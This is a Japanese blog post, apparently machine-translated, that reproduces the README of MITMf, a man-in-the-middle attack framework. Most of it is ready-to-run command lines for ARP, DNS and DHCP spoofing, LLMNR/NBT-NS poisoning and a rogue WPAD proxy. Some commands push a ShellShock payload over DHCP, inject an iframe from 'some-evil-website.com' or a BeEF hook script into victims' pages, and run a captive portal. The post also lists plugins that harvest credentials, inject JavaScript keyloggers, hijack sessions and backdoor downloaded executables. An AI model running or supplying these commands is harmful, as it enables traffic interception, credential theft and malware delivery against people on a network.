GitHubじゃ!Pythonじゃ!

GitHubからPython関係の優良リポジトリを探したかったのじゃー、でも英語は出来ないから日本語で読むのじゃー、英語社会世知辛いのじゃー

byt3bl33d3r

MITMf – Man-In-The-Middle攻撃のフレームワーク

投稿日:

Man-In-The-Middle攻撃のフレームワーク

MITMf

Man-In-The-Middle攻撃のフレームワーク

クイックチュートリアル、サンプル、および開発者の更新情報: https : //byt3bl33d3r.github.io

このツールは、 sergio-proxyに基づいており、プロジェクトを復活させて更新する試みです。

私に連絡する:

問題を提出する前に、wikiの該当するセクションをお読みください。

インストール

インストール手順についてはwikiを参照してください

説明

MITMfは、Man-In-The-Middleとネットワーク攻撃のワンストップショップを提供し、既存の攻撃や技術を更新し改善することを目指しています。

もともとは、他のツール(Ettercap、Malloryなど)の重大な欠点に対処するために作られたもので、誰もが独自のMITM攻撃を実装するために使用できるモジュラーで容易に拡張可能なフレームワークを提供するために、

特徴

  • このフレームワークには、さまざまなプラグインによって制御および使用できるビルトインのSMB、HTTP、およびDNSサーバーが含まれています。また、HTTP変更と部分的なHSTSバイパスを可能にするSSLStripプロキシの修正バージョンが含まれています。

  • バージョン0.9.8以降、MITMfはアクティブなパケットのフィルタリングと操作(基本的にはエターフィルタのほうが優れています)をサポートしており、ユーザーはあらゆる種類のトラフィックやプロトコルを変更できます。

  • MITMfの実行中に設定ファイルをオンザフライで編集することができます。変更はフレームワークを通して伝えられます。これにより、攻撃を実行しながらプラグインとサーバの設定を微調整することができます。

  • MITMfは、 Net-Credsを使用してFTP、IRC、POP、IMAP、Telnet、SMTP、SNMP(コミュニティ文字列)、NTLMv1 / v2(HTTP、SMB、LDAPなどのサポートされるすべてのプロトコル)およびKerberos資格情報を取得します起動。

  • レスポンダの統合により、LLMNR、NBT-NS、MDNSポイズニング、WPAD不正サーバがサポートされます。

アクティブなパケットのフィルタリング/修正

Scapy!を使用してMITMfによって傍受されるパケット/プロトコルを変更できるようになりました。 (これ以上のエターフィルタはありません!)

たとえば、ICMPパケットの宛先IPアドレスを変更するばかりの小さなフィルタがあります:

if packet.haslayer(ICMP):
	log.info('Got an ICMP packet!')
	packet.dst = '192.168.1.0'
  • packet変数を使用して、Scapy互換フォーマットのパケットにアクセスします。
  • data変数を使用して生のパケットデータにアクセスする

今私たちがする必要があるフィルタを使用するには: python mitmf.py -F ~/filter.py

他の誰かからのパケットを実際に傍受するために、これをSpoofプラグインと組み合わせたいと思うかもしれません;)

:MITMfを再起動することなく、オンザフライでフィルタを変更することができます!

最も基本的な使い方は、インタフェースenp3s0上でHTTPプロキシSMB、DNS、HTTPサーバ、Net-Credを起動します。

python mitmf.py -i enp3s0

ARPは、 スプーフィングプラグインを使用して、サブネット全体を192.168.1.1のゲートウェイで保護します。

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

上記と同じ+ レスポンダプラグインを使用するWPAD不正なプロキシサーバ:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARPポイズン192.168.1.16-45および192.168.0.1/24(192.168.1.1のゲートウェイ)

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

ARPポイズニング中にDNSスプーフィングを有効にします(スプーフィングするドメインは設定ファイルから取得されます)。

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

LLMNR / NBTNS / MDNSのなりすましを有効にする:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

DHCPスプーフィングを有効にします(IPプールとサブネットは設定ファイルから取得されます)。

python mitmf.py -i enp3s0 --spoof --dhcp

任意のクライアントが脆弱である場合に実行されるShellShockペイロードと同じです:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Injectプラグインを使用してHTMLのIFrameを挿入する:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

JSスクリプトを挿入する:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

すべてをhttp:// SERVER / PATHにリダイレクトするキャプティブポータルを開始します。

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portalurl http://SERVER/PATH

config / captiveフォルダからデフォルトのページ/portal.html(thxレスポンダ)と/CaptiveClient.exe(含まれていない)を使用して、 http://your-ip/portal.htmlのキャプティブポータルを開始します。

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive

上記と同じですが、IPの代わりにホスト名captive.portalを使用します(たとえば、DNSスプーフィングを使用してIPに解決するにはcaptive.portalが必要です)。

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --use-dns

http:// IP:8080 (mitmf.configのポートを変更)で、LOCALDIRに対応する追加のSimpleHTTPServerインスタンスを含むキャプティブポータルを提供します。

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --captive --portaldir LOCALDIR

上記と同じですがホスト名は同じです:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --dns --captive --portaldir LOCALDIR --use-dns

さらにはるかに!

もちろん、ほとんどすべてのプラグインを組み合わせて組み合わせることができます(ARPスプーフィング+インジェクション+レスポンダーなど)。

利用可能なオプションの完全な一覧は、 python mitmf.py --help実行するだけです。

現在利用可能なプラグイン

  • HTA Drive-By :偽のアップデート通知を送り、クライアントにHTAアプリケーションをダウンロードするように促す
  • SMBTrap :接続されたクライアントの「SMBトラップ」脆弱性を利用する
  • ScreenShotter :HTML5 Canvasを使用してクライアントブラウザの正確なスクリーンショットをレンダリングする
  • レスポンダ :LLMNR、NBT-NS、WPAD、MDNSポイズンジャー
  • SSLstrip + :部分的にバイパスするHSTS
  • Spoof :ARP、ICMP、DHCP、またはDNSのなりすましを使用してトラフィックをリダイレクトする
  • BeEFAutorun :クライアントのOSまたはブラウザの種類に基づいてBeEFモジュールを自動実行する
  • AppCachePoison :HTML5 App-Cache中毒攻撃を実行する
  • Ferret-NG :クライアントセッションを透過的に乗っ取る
  • BrowserProfiler :接続されたクライアントのすべてのブラウザプラグインを列挙しようとします。
  • FilePwn :バックドアファクトリとBDFProxyを使用してHTTP経由で送信されたバックドア実行ファイル
  • 注入 :任意のコンテンツをHTMLコンテンツに挿入する
  • BrowserSniper :古いブラウザプラグインを使用しているクライアントに対してドライブバイ攻撃を実行する
  • JSkeylogger :JavaScriptのキーロガーをクライアントのWebページに挿入する
  • 置き換え :HTMLコンテンツの任意のコンテンツを置き換える
  • SMBAuth :SMBチャレンジ/レスポンス認証の試みを呼び起こす
  • Upsidedownternet :画像を180度反転する
  • キャプティブ :キャプティブポータルを作成し、302を使用してHTTPリクエストをリダイレクトします。

紅茶&寿司の準備資金の資金調達方法

BTC:1ER8rRE6NTZ7RHN88zc6JY87LvtyuRUJGU

ETH:0x91d9aDCf8B91f55BCBF0841616A01BeE551E90ee

LTC:LLMa2bsvXbgBGnnBwiXYazsj7Uz6zRe4fr







-byt3bl33d3r
-, , ,

執筆者: